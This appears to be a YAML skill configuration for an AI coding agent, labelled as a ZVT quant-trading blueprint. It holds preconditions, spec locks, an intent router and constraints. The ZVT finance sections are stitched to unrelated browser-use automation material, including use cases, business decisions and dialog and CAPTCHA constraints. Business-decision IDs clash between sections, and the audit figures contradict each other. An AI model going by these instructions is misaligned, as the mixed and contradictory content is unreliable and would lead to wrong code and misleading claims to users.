  - human_summary.what_i_ask_you[]
  - evidence_quality.user_disclosure_template
  - post_install_notice.message_template.positioning
  - post_install_notice.message_template.capability_catalog.groups[].name
  - post_install_notice.message_template.capability_catalog.groups[].description
  - post_install_notice.message_template.capability_catalog.groups[].ucs[].name
  - post_install_notice.message_template.capability_catalog.groups[].ucs[].short_description
  - post_install_notice.message_template.call_to_action
  - post_install_notice.message_template.featured_entries[].beginner_prompt
  - post_install_notice.message_template.more_info_hint
  - preconditions[].description
  - preconditions[].on_fail
  - intent_router.uc_entries[].name
  - intent_router.uc_entries[].ambiguity_question
  - architecture.pipeline
  - architecture.stages[].narrative.does_what
  - architecture.stages[].narrative.key_decisions
  - architecture.stages[].narrative.common_pitfalls
  - constraints.fatal[].consequence
  - constraints.regular[].consequence
  - output_validator.assertions[].failure_message
  - acceptance.hard_gates[].on_fail
  - skill_crystallization.action
  locale_detection_order:
  - explicit_user_declaration
  - first_message_language
  - system_locale
  translation_enforcement:
    trigger: on_first_user_message
    action: Render user_facing_fields in detected locale, preserving all IDs (BD-/SL-/UC-/finance-C-) and code identifiers
      verbatim
    violation_code: LOCALE-01
    violation_signal: User receives untranslated English Human Summary when detected locale != en
evidence_quality:
  declared:
    evidence_coverage_ratio: null
    evidence_verify_ratio: null
    evidence_invalid: 0
    evidence_verified: null
    evidence_auto_fixed: null
    audit_coverage: 20 finance-universal not_applicable + 6 AIL items reviewed (4 warn + 2 fail) + 5 DAT items reviewed (1
      pass + 3 warn + 1 NA) + 8 round2-verified anti-pattern/divergence findings = 39 items reviewed across applicable scope
    audit_pass_rate: 1/13 (8% applicable items pass; 12 warn/fail/missing capture the architectural boundaries and divergences
      worth surfacing as constraints)
    audit_fail_total: 0
    audit_finance_universal:
      pass: 0
      warn: 0
      fail: 0
    audit_subdomain_totals:
      pass: 0
      warn: 0
      fail: 0
  enforcement_rules:
  - id: EQ-01
    trigger: declared.evidence_verify_ratio < 0.5
    action: MUST invoke traceback lookup for all cited BD-IDs in output before emitting business code — read LATEST.yaml sections
      for each BD referenced
    violation_code: EQ-01-V
    violation_signal: Generated script references BD-IDs but no tool_call to read LATEST.yaml preceded code generation
  - id: EQ-02
    trigger: always
    action: MUST prepend user_disclosure_template (translated to user locale) to first user-facing response
    violation_code: EQ-02-V
    violation_signal: First agent response to user does not contain audit warning phrase
  user_disclosure_template: '[QUALITY NOTICE] This crystal was compiled from blueprint finance-bp-133. Evidence verify ratio
    = 0.0% and audit fail total = 0. Generated results may have uncaptured requirement gaps. Verify critical decisions against
    source files (LATEST.yaml / LATEST.jsonl).'
traceback:
  source_files:
    blueprint: LATEST.yaml
    constraints: LATEST.jsonl
  mandatory_lookup_scenarios:
  - id: TB-01
    condition: Two constraints have apparently conflicting enforcement rules
    lookup_target: LATEST.jsonl — find both constraint IDs, compare `consequence` + `evidence_refs` to determine priority
  - id: TB-02
    condition: A business decision rationale is unclear or disputed
    lookup_target: LATEST.yaml — locate BD-ID under business_decisions, read `rationale` + `alternative_considered` fields
  - id: TB-03
    condition: evidence_invalid > 0 in evidence_quality.declared
    lookup_target: LATEST.yaml _enrich_meta — cross-check specific BD `evidence_refs` fields for invalid markers
  - id: TB-04
    condition: User asks where a rule comes from
    lookup_target: LATEST.jsonl — find constraint by ID, read `confidence.evidence_refs` for source file + line number
  - id: TB-05
    condition: Generated code does not match expected ZVT API behavior
    lookup_target: LATEST.yaml stages[].required_methods — verify method signature and evidence locator in source code
  degraded_lookup:
    no_fs_access: 'Ask the user to paste the relevant LATEST.yaml section or LATEST.jsonl lines for the BD-/finance-C- IDs
      in question. Crystal ID: finance-bp-133-v5.0.'
trace_schema:
  event_types:
  - precondition_check
  - spec_lock_check
  - evidence_rule_fired
  - evidence_rule_skipped
  - locale_translation_emitted
  - hard_gate_passed
  - hard_gate_failed
  - skill_emitted
  - false_completion_claim
preconditions:
- id: PC-01
  description: zvt package installed and importable
  check_command: python3 -c 'import zvt; print(zvt.__version__)'
  on_fail: 'Run: python3 -m pip install zvt  then re-run: python3 -m zvt.init_dirs to initialize data directories'
  severity: fatal
- id: PC-02
  description: K-data exists for target entities (required before backtesting)
  check_command: python3 -c "from zvt.api.kdata import get_kdata; df = get_kdata(entity_ids=['stock_sh_600000'], limit=1);
    assert df is not None and len(df) > 0, 'No kdata found'"
  on_fail: 'Run recorder first: python3 -m zvt.recorders.em.em_stock_kdata_recorder --entity_ids stock_sh_600000  (replace
    with your target entity IDs)'
  severity: fatal
  applies_to_uc: []
- id: PC-03
  description: ZVT data directory initialized (~/.zvt or ZVT_HOME)
  check_command: 'python3 -c "import os; from pathlib import Path; zvt_home = Path(os.environ.get(''ZVT_HOME'', Path.home()
    / ''.zvt'')); assert zvt_home.exists(), f''ZVT home not found: {zvt_home}''"'
  on_fail: 'Run: python3 -m zvt.init_dirs'
  severity: fatal
- id: PC-04
  description: SQLite write permission for ZVT data directory
  check_command: python3 -c "import os, tempfile; from pathlib import Path; zvt_home = Path(os.environ.get('ZVT_HOME', Path.home()
    / '.zvt')); test_f = zvt_home / '.write_test'; test_f.touch(); test_f.unlink()"
  on_fail: 'Check directory permissions: chmod u+w ~/.zvt  or set ZVT_HOME environment variable to a writable location'
  severity: warn
intent_router:
  uc_entries:
  - uc_id: UC-001
    name: Apply to a Job (Rochester Health) — auto-fill form + upload resume
    positive_terms:
    - apply
    - job application
    - resume upload
    - form fill
    data_domain: web
    negative_terms:
    - 1password
    - secret manager login
    ambiguity_question: Does the user store credentials in a password manager? If yes, see UC-006.
  - uc_id: UC-002
    name: Migros online groceries shopping + checkout (TWINT)
    positive_terms:
    - shopping
    - groceries
    - cart
    - checkout
    data_domain: web
    negative_terms:
    - phone comparison
    - itx pc build
    ambiguity_question: Is the goal cross-site comparison (UC-008) or end-of-flow checkout (UC-002)?
  - uc_id: UC-003
    name: Greek MFA visa appointment monitoring
    positive_terms:
    - visa
    - appointment
    - monitor
    - schedule
    data_domain: web
    negative_terms:
    - one-shot tasks (this is recurring polling)
  - uc_id: UC-004
    name: Extract PDF content (House.gov documents)
    positive_terms:
    - pdf
    - extract
    - read pages
    - document parse
    data_domain: web
    negative_terms:
    - excel
    - pydantic schema output
    ambiguity_question: Output target is PDF-text vs Excel vs Pydantic? PDF-text = UC-004; Excel = UC-017; Pydantic = UC-016.
  - uc_id: UC-005
    name: Captcha demo (cloud-only solving)
    positive_terms:
    - captcha
    - solve
    - demo
    data_domain: web
    negative_terms:
    - air-gapped / OSS-only deployments
  - uc_id: UC-006
    name: 1Password secure login (vault-backed credentials)
    positive_terms:
    - login
    - 1password
    - credential vault
    - secret manager
    data_domain: web
    negative_terms:
    - apply to job
    - simple form fill
    ambiguity_question: If credentials live in a password manager, use UC-006. Otherwise UC-001.
  - uc_id: UC-007
    name: PCPartPicker — build an ITX PC with budget constraint
    positive_terms:
    - pc build
    - itx
    - budget
    - parts compatibility
    data_domain: web
    negative_terms:
    - non-PCPartPicker hardware sites
  - uc_id: UC-008
    name: Phone cross-site comparison (structured output)
    positive_terms:
    - compare
    - phone
    - cross-site
    - structured output
    data_domain: web
    negative_terms:
    - groceries checkout
    - itx build
    ambiguity_question: Goal is comparison (UC-008), checkout (UC-002), or compatibility (UC-007)?
  - uc_id: UC-009
    name: Find influencer profiles across platforms
    positive_terms:
    - influencer
    - social
    - profile search
    data_domain: web
    negative_terms:
    - single-platform-only search
  - uc_id: UC-010
    name: Multi-tab parallel exploration
    positive_terms:
    - multi-tab
    - parallel exploration
    data_domain: web
    negative_terms:
    - single-tab linear flows
  - uc_id: UC-011
    name: Multi-agent parallel runs
    positive_terms:
    - parallel agents
    - fan-out
    - multi-agent
    data_domain: web
    negative_terms:
    - tasks needing single-agent state continuity
  - uc_id: UC-012
    name: File download (Excel / PDF)
    positive_terms:
    - download
    - file
    - save
    data_domain: web
    negative_terms:
    - in-page rendering only (no download trigger)
  - uc_id: UC-013
    name: Sensitive-data form fill (LLM never sees plaintext)
    positive_terms:
    - sensitive data
    - password
    - mask credentials
    data_domain: web
    negative_terms:
    - workflows on untrusted domains without allowed_domains lockdown
  - uc_id: UC-014
    name: Domain access restrictions (allowed/prohibited)
    positive_terms:
    - allowed_domains
    - prohibited
    - scope lockdown
    - security
    data_domain: web
    negative_terms:
    - open-web exploration tasks
  - uc_id: UC-015
    name: Custom system prompt (extend or override)
    positive_terms:
    - system prompt
    - customize
    - override
    data_domain: web
    negative_terms:
    - users who would lose AP4 protection by stripping "only use indexes provided" rule
  - uc_id: UC-016
    name: Structured output (Pydantic schema)
    positive_terms:
    - structured output
    - pydantic
    - schema
    data_domain: web
    negative_terms:
    - free-form natural-language outputs
  - uc_id: UC-017
    name: Excel generation (Alphabet earnings)
    positive_terms:
    - excel
    - csv
    - earnings
    - file write
    data_domain: web
    negative_terms:
    - in-memory pipeline only
  - uc_id: UC-018
    name: Sandbox deployment via @sandbox decorator
    positive_terms:
    - sandbox
    - production
    - cloud deploy
    data_domain: web
    negative_terms:
    - air-gapped / on-prem
  - uc_id: UC-019
    name: Cloud browser + persistent profile + proxy
    positive_terms:
    - cloud
    - profile
    - proxy
    - stealth
    - captcha bypass
    data_domain: web
    negative_terms:
    - air-gapped
    - cost-sensitive batch
  - uc_id: UC-020
    name: CLI daemon (terminal control of local browser)
    positive_terms:
    - cli
    - daemon
    - terminal
    - interactive
    data_domain: web
    negative_terms:
    - programmatic Python integration (use Agent class directly)
context_state_machine:
  states:
  - id: CA1_MEMORY_CHECKED
    entry: Task started
    exit: All memory queries attempted and recorded; memory_unavailable set if failed
    timeout: 30s — skip memory, mark memory_unavailable=true, proceed to CA2
  - id: CA2_GAPS_FILLED
    entry: CA1 complete
    exit: 'All FATAL-priority required inputs answered: target market (A-share/HK/US), data source, time range, strategy type'
    timeout: NOT skippable — FATAL inputs MUST be user-answered before proceeding
  - id: CA3_PATH_SELECTED
    entry: CA2 complete
    exit: intent_router matched single use case with confidence gap > 20% over next candidate, no data_domain ambiguity
    timeout: Trigger ambiguity_question for top-2 candidates, await user selection
  - id: CA4_EXECUTING
    entry: CA3 complete + user explicit confirmation received
    exit: All hard gates G1-Gn passed and output files written
    timeout: NOT skippable — user confirmation of execution path required
  enforcement: Code generation is PROHIBITED before CA4_EXECUTING. Any regression to earlier state MUST be announced to user.
    buy/sell ordering SL-01 check runs at CA4 entry.
spec_lock_registry:
  semantic_locks:
  - id: SL-01
    description: Execute sell orders before buy orders in every trading cycle
    locked_value: sell() called before buy() in each Trader.run() iteration
    violation_is: fatal
    source_bd_ids:
    - BD-018
  - id: SL-02
    description: Trading signals MUST use next-bar execution (no look-ahead)
    locked_value: due_timestamp = happen_timestamp + level.to_second()
    violation_is: fatal
    source_bd_ids:
    - BD-014
    - BD-025
  - id: SL-03
    description: Entity IDs MUST follow format entity_type_exchange_code
    locked_value: stock_sh_600000 | stockhk_hk_0700 | stockus_nasdaq_AAPL
    violation_is: fatal
    source_bd_ids: []
  - id: SL-04
    description: DataFrame index MUST be MultiIndex (entity_id, timestamp)
    locked_value: df.index.names == ['entity_id', 'timestamp']
    violation_is: fatal
    source_bd_ids: []
  - id: SL-05
    description: 'TradingSignal MUST have EXACTLY ONE of: position_pct, order_money, order_amount'
    locked_value: XOR enforcement in trading/__init__.py:68
    violation_is: fatal
    source_bd_ids: []
  - id: SL-06
    description: 'filter_result column semantics: True=BUY, False=SELL, None/NaN=NO ACTION'
    locked_value: factor.py:475 order_type_flag mapping
    violation_is: fatal
    source_bd_ids: []
  - id: SL-07
    description: Transformer MUST run BEFORE Accumulator in factor pipeline
    locked_value: 'compute_result(): transform at :403 before accumulator at :409'
    violation_is: fatal
    source_bd_ids: []
  - id: SL-08
    description: 'MACD parameters locked: fast=12, slow=26, signal=9'
    locked_value: factors/algorithm.py:30 macd(slow=26, fast=12, n=9)
    violation_is: fatal
    source_bd_ids:
    - BD-036
  - id: SL-09
    description: 'Default transaction costs: buy_cost=0.001, sell_cost=0.001, slippage=0.001'
    locked_value: sim_account.py:25 SimAccountService default costs
    violation_is: warning
    source_bd_ids:
    - BD-029
  - id: SL-10
    description: A-share equity trading is T+1 (no same-day close of buy positions)
    locked_value: sim_account.available_long filters by trading_t
    violation_is: fatal
    source_bd_ids: []
  - id: SL-11
    description: Recorder subclass MUST define provider AND data_schema class attributes
    locked_value: contract/recorder.py:71 Meta; register_schema decorator
    violation_is: fatal
    source_bd_ids: []
  - id: SL-12
    description: Factor result_df MUST contain either 'filter_result' OR 'score_result' column
    locked_value: result_df.columns.intersection({'filter_result', 'score_result'}) non-empty
    violation_is: fatal
    source_bd_ids: []
  implementation_hints:
  - id: IH-01
    hint: 'Use AdjustType enum exactly: qfq (pre-adjust), hfq (post-adjust), bfq (none) — contract/__init__.py:121'
  - id: IH-02
    hint: For A-share kdata, default to hfq for long-term analysis (dividend-adjusted) — trader.py:538 StockTrader
  - id: IH-03
    hint: SQLite connection MUST use check_same_thread=False for multi-threaded recorders
  - id: IH-04
    hint: Accumulator state serialization uses JSON with custom encoder/decoder hooks — contract/base_service.py
  - id: IH-05
    hint: Factor.level MUST match TargetSelector.level (enforced at add_factor) — factors/target_selector.py:84
preservation_manifest:
  required_objects:
    business_decisions_count: 20
    fatal_constraints_count: 4
    non_fatal_constraints_count: 36
    use_cases_count: 20
    semantic_locks_count: 12
    preconditions_count: 4
    evidence_quality_rules_count: 2
    traceback_scenarios_count: 5
architecture:
  pipeline: data_collection -> data_storage -> factor_computation -> target_selection -> trading_execution -> visualization
  stages:
  - id: data_collection
    narrative:
      does_what: TimeSeriesDataRecorder and FixedCycleDataRecorder fetch OHLCV and fundamental data from providers (eastmoney,
        joinquant, baostock, akshare) and persist domain objects (Stock1dKdata, BalanceSheet) to SQLite via df_to_db().
      key_decisions: BD-002 chose evaluate_start_end_size_timestamps for incremental fetch (not full refresh) because comparing
        to get_latest_saved_record avoids redundant API calls; BD-003 chose get_data_map field transformation to keep domain
        schema provider-agnostic.
      common_pitfalls: 'Don''t forget SL-11: Recorder subclass MUST declare both provider and data_schema class attributes
        else initialization fails with assertion error; finance-C-001 fatal violation.'
    business_decisions: []
  - id: data_storage
    narrative:
      does_what: StorageBackend persists DataFrames to per-provider SQLite databases at {data_path}/{provider}/{provider}_{db_name}.db
        using path templates from _get_path_template; Mixin.record_data and Mixin.query_data provide uniform read/write interface.
      key_decisions: BD-004 chose StorageBackend abstraction (not hardcoded SQLite) to allow future cloud storage swap; BD-006
        derives db_name from data_schema __tablename__ for per-domain database isolation.
      common_pitfalls: SL-04 violation (wrong DataFrame index) causes factor pipeline failures downstream; always ensure df.index.names
        == ['entity_id', 'timestamp'] before calling record_data.
    business_decisions: []
  - id: factor_computation
    narrative:
      does_what: Factor.compute() applies Transformer (stateless, e.g. MacdTransformer) then Accumulator (stateful, e.g. MaStatsAccumulator)
        to produce filter_result or score_result columns; EntityStateService persists per-entity rolling state across batches.
      key_decisions: BD-007 chose Factor inheriting DataReader for composable data access; SL-08 locks MACD at (fast=12, slow=26,
        n=9) — chose standard Appel parameters not adaptive because interpretability matters for practitioners.
      common_pitfalls: 'SL-07: Transformer MUST run before Accumulator — swapping order causes NaN propagation; SL-12: result_df
        must contain filter_result OR score_result column or TargetSelector silently drops all signals.'
    business_decisions: []
  - id: target_selection
    narrative:
      does_what: TargetSelector.add_factor() registers Factor instances; get_targets() returns entity_ids passing threshold
        filter at a specific timestamp, enabling point-in-time historical backtesting without look-ahead.
      key_decisions: BD-012 chose registrable factor list (not hardcoded) for runtime customization; BD-013 chose timestamp-specific
        filtering not current-only because backtests need historical point-in-time correctness.
      common_pitfalls: Factor.level MUST match TargetSelector.level (IH-05); mismatched levels cause silent empty target lists
        that look like no signals but are actually level-mismatch bugs.
    business_decisions: []
  - id: trading_execution
    narrative:
      does_what: Trader.run() calls sell() before buy() each cycle, generates TradingSignals with due_timestamp = happen_timestamp
        + level.to_second() for next-bar execution, and applies on_profit_control() for stop-loss/take-profit before regular
        target selection.
      key_decisions: SL-01 locks sell-before-buy order because available_long check in sim_account depends on it — chose this
        over symmetric ordering to prevent implicit leverage; BD-039 chose long=AND/short=OR multi-level logic to reflect
        risk asymmetry.
      common_pitfalls: 'SL-02 violation (immediate execution instead of next-bar) introduces look-ahead bias and makes backtest
        results unreproducible in live trading; SL-10: A-share T+1 constraint — backtesting without it overstates returns.'
    business_decisions: []
  - id: visualization
    narrative:
      does_what: Drawer.draw() combines kline main chart with factor overlays and Rect annotations for entry/exit signals
        using Plotly; Drawable interface on Factor enables consistent chart rendering across data types.
      key_decisions: BD-019 chose drawer_rects subclass override for custom annotations not hardcoded markers — allows traders
        to define entry/exit visuals without modifying base drawing logic.
      common_pitfalls: draw_result=True by default (BD-055) is fine for development but set draw_result=False in production/headless
        environments to avoid Plotly server startup overhead.
    business_decisions: []
  - id: cross_cutting_concerns
    narrative:
      does_what: 'Invariants and utilities that span multiple pipeline stages — collected from 7 source groups: action_execute(2),
        browser_session_init(1), cross_cutting(8), llm_step(2), post_step(2), prompt_render(2), and 1 more.'
      key_decisions: 20 BDs merged here because they apply to more than one main stage (e.g. algorithm helpers, default value
        choices, ordering contracts, error handling). Agent should inspect individual BD summaries and link back to affected
        main stages via shared IDs.
      common_pitfalls: Cross-cutting concerns frequently surface as bugs when changes to one main stage unintentionally break
        another. Check constraints referencing these BDs and verify invariants still hold after any stage-local modification.
    business_decisions:
    - id: BD-003
      type: B/BA
      summary: JS dialogs alert + confirm + beforeunload auto-accepted; prompt auto-cancelled (destructive confirms included)
    - id: BD-007
      type: B/BA
      summary: max_actions_per_step default = 5 (code) — DOC SAYS 3 (AGENTS.md:303 stale)
    - id: BD-004
      type: B
      summary: Default browser_target = local_chromium spawned by local_browser_watchdog
    - id: BD-013
      type: missing
      summary: sensitive_data is fail-OPEN when allowed_domains is unset (warning only, no raise)
    - id: BD-014
      type: missing
      summary: SPA DOM rerender bypasses multi_act Layer-2 guard (URL + focus_target_id only)
    - id: BD-015
      type: missing
      summary: JS dialog auto-accept does not distinguish destructive vs harmless confirms
    - id: BD-016
      type: missing
      summary: DOM text truncation at 40000 chars is a silent hard cut
    - id: BD-017
      type: missing
      summary: max_iframes=100 silent log warning, not surfaced to LLM
    - id: BD-018
      type: missing
      summary: CAPTCHA solving depends on private CDP event from cloud proxy
    - id: BD-019
      type: missing
      summary: Multi-LLM-vendor support is duck-typed (no ABC) — copy-paste class drift risk
    - id: BD-020
      type: missing
      summary: OSS path lacks fingerprint/anti-detection — only available via use_cloud=True
    - id: BD-002
      type: B
      summary: observe + think + act fused in a single LLM call (NOT ReAct)
    - id: BD-010
      type: B
      summary: use_vision != 'auto' force-removes screenshot tool from registry (silent user config rewrite)
    - id: BD-005
      type: B/BA
      summary: max_failures = 5 default + final_response_after_failure = True (one extra retry)
    - id: BD-006
      type: B
      summary: Loop detection rolling window = 20 with two metrics (action repetition + page stagnation)
    - id: BD-009
      type: B/BA
      summary: 8 system_prompt template matrix selected by (model_family x use_thinking x flash_mode)
    - id: BD-012
      type: B
      summary: Tasks classified into specific step-by-step vs open-ended (system_prompt.md:91-94)
    - id: BD-001
      type: B
      summary: Numeric integer indices replace CSS selectors / XPath in the LLM-visible DOM
    - id: BD-008
      type: B
      summary: PDF auto-download + file_system read pattern (not in-browser DOM)
    - id: BD-011
      type: M
      summary: Paint-order filtering excludes occluded interactive elements from LLM view
resources:
  packages:
  - name: pandas
    version_pin: ==1.5.3
  - name: numpy
    version_pin: ==1.24.4
  - name: matplotlib
    version_pin: '>=2'
  - name: requests
    version_pin: ==2.31.0
  - name: scipy
    version_pin: '>=1.3.0'
  - name: scikit-learn
    version_pin: '>1.4.2'
  - name: pytest
    version_pin: '>=8.3'
  strategy_scaffold:
    entry_point_name: run_backtest
    output_path: result.csv
    execution_mode: backtest
    conditional_entry_points:
      backtest:
        entry_point_name: run_backtest
        output_path: result.csv
      collector:
        entry_point_name: run_collector
        output_path: result.json
      factor:
        entry_point_name: run_factor
        output_path: result.parquet
      training:
        entry_point_name: run_training
        output_path: result.json
      serving:
        entry_point_name: run_server
        output_path: result.json
      research:
        entry_point_name: run_research
        output_path: result.json
    tail_template: "# === DO NOT MODIFY BELOW THIS LINE ===\nif __name__ == \"__main__\":\n    result = run_backtest()  #\
      \ implement above\n    from validate import enforce_validation\n    enforce_validation(result, output_path=\"{workspace}/result.csv\"\
      )\n# === END DO NOT MODIFY ==="
  host_adapter:
    target: openclaw
    timeout_seconds: 1800
    shell_operator_restriction: 'exec tool intercepts && / ; / | — never chain: ''pip install X && python Y''. Use separate
      exec calls.'
    install_recipes:
    - python3 -m pip install zvt
    credential_injection: JoinQuant/QMT credentials require user-side '!' prefix shell login. Never hardcode credentials in
      generated scripts.
    path_resolution: '{workspace} resolves to ~/.openclaw/workspace/doramagic at execution time.'
    file_io_tooling: Use openclaw 'write' tool for .py/.sql files; 'exec' tool for python3 /absolute/path/script.py (absolute
      paths only).
constraints:
  fatal:
  - id: '?'
    when: When designing or coding any browser-use workflow that touches admin tools, file management, settings pages, or
      any UI where confirm dialogs may guard irreversible operations
    action: Either (a) register a custom @tools.action that intercepts dialogs BEFORE popups_watchdog dispatches them (override
      dispatch order); (b) write a custom watchdog subclassing BaseWatchdog that LISTENS_TO Page.javascriptDialogOpening and
      overrides should_accept logic with semantic dialog-text classification; or (c) explicitly tell the LLM in the system
      prompt extension that destructive operations require a separate user-confirmation step recorded in todo.md before any
      click that could surface a confirm dialog. Document this as a hard prerequisite in your skill — host AI cannot rely
      on the framework to refuse destructive confirms.
    severity: fatal
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: '?'
    when: When constructing an Agent and passing the sensitive_data parameter (passwords, API keys, PII, financial credentials)
    action: 'Wrap Agent construction in your own factory that explicitly raises ValueError if sensitive_data is provided AND
      browser_profile.allowed_domains is empty/None. Recommended pattern: def make_agent(task, llm, sensitive_data, allowed_domains):
      assert allowed_domains, ''allowed_domains REQUIRED when sensitive_data set''; return Agent(task=task, llm=llm, sensitive_data=sensitive_data,
      browser=Browser(allowed_domains=allowed_domains)). Treat the framework''s warning as documentation, not as protection.'
    severity: fatal
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: '?'
    when: When designing an agent task targeting a SPA — single-page-application, React/Vue/Angular routing, or any site with
      frequent client-side DOM rerenders that do not change the URL
    action: 'Set max_actions_per_step=1 for SPA-heavy targets so each LLM step is forced to re-read state before the next
      click. Alternatively, write a custom Layer-3 guard: subclass BaseWatchdog, LISTENS_TO ActionExecutedEvent, run a CDP
      DOMSnapshot.captureSnapshot pre/post and compare a hash of the interactive subtree; emit a synthetic PageChangedEvent
      on diff so multi_act breaks. Do NOT trust the default Layer-2 guard for SPA flows.'
    severity: fatal
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: '?'
    when: When extending or overriding the system prompt via Agent(extend_system_message=...) or override_system_message=...,
      or when designing few-shot reasoning patterns for the LLM
    action: If you override the system prompt, KEEP the system_prompt.md:71 sentence verbatim ('Only use indexes that are
      explicitly provided in the [N] prefix of the most recent state'). If you extend the prompt, never instruct the LLM to
      memorize indices across steps. In any custom @tools.action that emits messages back to the LLM, do not echo numeric
      indices from prior steps. Audit your prompt extensions for any text that could encourage cross-step index reuse.
    severity: fatal
    kind: domain_rule
    modality: must_not
    consequence: null
  regular:
  - id: '?'
    when: When building an agent that targets React/Vue/Angular SPAs, infinite-scroll feeds, or any site whose DOM rerenders
      without URL changes
    action: 'Pass max_actions_per_step=1 explicitly to Agent(): agent = Agent(task=..., llm=..., max_actions_per_step=1, browser=Browser(...)).
      Trade-off: ~3-5x more LLM calls per task vs default 5, but eliminates the silent-misclick risk. Document the choice
      in your skill / wrapper so reviewers see the SPA-specific tuning. Do NOT silently inherit the code default 5 on SPA
      targets.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When writing any host wrapper, skill recipe, or LLM prompt that references the max_actions_per_step default value,
      or when reading AGENTS.md to understand framework behavior
    action: 'Encode 5 as the default value in any documentation, recipe, or wrapper code. If you need to override (e.g. SPA
      workflows per browseruse-C-004), pass an explicit value. Treat AGENTS.md:303 as out of sync — when it disagrees with
      code, code wins. Note: this constraint exists only because round1 inherited the stale doc value in three places; any
      future re-reading of AGENTS.md must double-check service.py:175.'
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When documenting llm_timeout behavior, choosing a custom value, or when an LLM call is timing out and the developer
      needs to know which timeout actually applies
    action: 'Bucket the timeout in any documentation: gemini-3-pro / o3 / claude / sonnet / deepseek = 90s; groq = 30s; everything
      else (other gemini, openai, ollama, lmstudio, ChatBrowserUse, unrecognized) = 75s. To override, pass llm_timeout=N to
      Agent(); choose 90s+ for slow reasoning models, 30s for groq-fast workloads. Do not assume the default is 90s for unrecognized
      models — that gives a false sense of headroom.'
    severity: low
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When documenting prompt template selection logic, or when extending the framework with a new model family that needs
      a custom prompt template
    action: 'Reference the 8 templates by name in any documentation. To add a new model family: copy the closest existing
      template, edit the selection logic in browser_use/agent/prompts.py:60-91, register the new template path. Do not assume
      there are 9 — only 8 exist. The Anthropic 4.5 specialized template is intentionally engineered to exceed 4096 tokens
      for prompt-cache eligibility — preserve this when extending.'
    severity: low
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When publishing a skill / recipe / wrapper for browser-use to OSS users, or when an LLM agent encounters a CAPTCHA
      on a self-hosted run
    action: 'In any host wrapper or skill targeting OSS users: explicitly document that CAPTCHA auto-solving requires use_cloud=True
      (paid). Override or extend the system prompt to remove or qualify the ''CAPTCHAs are automatically solved'' claim —
      replace with ''CAPTCHAs may require user intervention or use_cloud=True''. Implement a fallback action (custom @tools.action)
      that detects CAPTCHA presence and pauses for human input or fails gracefully, instead of relying on the no-op watchdog.'
    severity: medium
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: '?'
    when: When publishing a skill / recipe / wrapper claiming browser-use can scrape e-commerce / aggregator / fintech / streaming
      sites that ship anti-bot stacks
    action: 'Explicitly state in your skill/wrapper that anti-bot bypass requires use_cloud=True (paid hosted plan). For OSS
      users targeting bot-protected sites: document that they will likely hit 403/CAPTCHA walls, recommend either (a) upgrading
      to use_cloud=True, (b) targeting an unprotected mirror or API endpoint, or (c) accepting the limitation. Do not promise
      stealth in OSS-only documentation; the stealth modules are not present in the OSS source tree.'
    severity: medium
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: '?'
    when: When the agent task targets long-list pages (search results, infinite-scroll feeds, e-commerce SKU listings) where
      critical interactive elements may live below the first ~40000 characters of serialized DOM
    action: '(a) Extend the system prompt with a hint: ''If the page state mentions (truncated to N characters), use scroll(direction=down)
      to bring more elements into view, then re-evaluate.'' (b) For known long-page targets, set scroll-first as a deterministic
      step before the main task. (c) Increase max_clickable_elements_length only with care — larger DOM text inflates LLM
      token cost on every step. Do not silently assume the LLM ''sees the whole page''.'
    severity: medium
    kind: domain_rule
    modality: should
    consequence: null
  - id: '?'
    when: When the agent task targets portal-style sites with many embedded iframes (ad slots, social embeds, multi-tenant
      dashboards, news aggregators)
    action: (a) For known iframe-heavy targets, raise max_iframes via BrowserProfile(max_iframes=200) or higher — at the cost
      of longer DOM snapshot time. (b) Monitor logger output for the 'Limiting processing of N iframes' warning during dev
      runs and adjust accordingly. (c) For tasks that depend on iframes likely below the cap, document the dependency in your
      wrapper. Do not assume the LLM will know iframes were dropped — the log is invisible to it.
    severity: medium
    kind: domain_rule
    modality: should
    consequence: null
  - id: '?'
    when: When constructing Agent with use_vision=False/True (anything except 'auto') and also passing custom Tools that include
      or expect screenshot capability
    action: If you need screenshot capability, set use_vision='auto' (the default; allows the LLM to call screenshot on demand).
      If you set use_vision=False, accept that the screenshot tool is gone — do not register it via custom Tools or expect
      it in the action list. To debug why screenshot is missing, look at service.py:319 second-pass cleanup, NOT the user-side
      Tools() config. Document this surprise in any wrapper that exposes use_vision to end users.
    severity: medium
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: '?'
    when: When auto-selecting an LLM model in a wrapper / skill, or when a user passes a DeepSeek / grok-3 / grok-code model
      with use_vision left at default True
    action: 'In any model-selection layer: if model name matches /deepseek/i or /grok-3/i or /grok-code/i, set use_vision=False
      explicitly before constructing Agent. This avoids the warning log and makes the configuration explicit. Note: grok-2
      and grok-4 DO support vision per the framework; only grok-3 and grok-code are downgraded. Document the vision-capable
      vs vision-blocked model list in your wrapper.'
    severity: medium
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: '?'
    when: When implementing a custom @tools.action that needs access to the BrowserSession (most non-trivial actions do)
    action: 'Use exact signature: `async def my_action(params: MyActionParams, browser_session: BrowserSession) -> ActionResult`.
      Do NOT rename to `browser` / `bs` / `session`. The registry uses Python parameter introspection to inject — name match
      is exact. AGENTS.md:842-846 documents this pitfall. Add a unit test that calls your custom action through the registry
      path (not direct call) to catch name typos at test time.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When extending browser-use with new browser-side functionality (new dialog handler, custom event reaction, additional
      CDP subscription, new persistence layer)
    action: 'Create browser_use/browser/watchdogs/{your_name}_watchdog.py: subclass BaseWatchdog, declare LISTENS_TO = [EventClass1,
      ...] and EMITS = [...], implement on_<EventName> handlers. Wire into BrowserSession by adding to the import list at
      session.py:1-50. Do NOT add inline if/elif logic to session.py methods. The bubus EventBus dispatches to watchdogs based
      on the LISTENS_TO declaration — this is the seam for extension.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When a contributor or wrapper-author wants to use Playwright APIs (e.g. page.locator(), expect(), trace recording)
      inside browser-use code
    action: 'Implement the desired functionality via cdp-use directly: use cdp_session.cdp_client.send.<Domain>.<Method>(...)
